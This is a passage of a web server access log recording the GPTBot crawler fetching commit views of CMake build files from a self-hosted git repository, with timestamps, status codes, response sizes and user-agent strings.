AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15125] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11622] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11622] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13733] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15127] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24305] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24302] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13731] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:31:06 +0000] - 200 200 - GET https 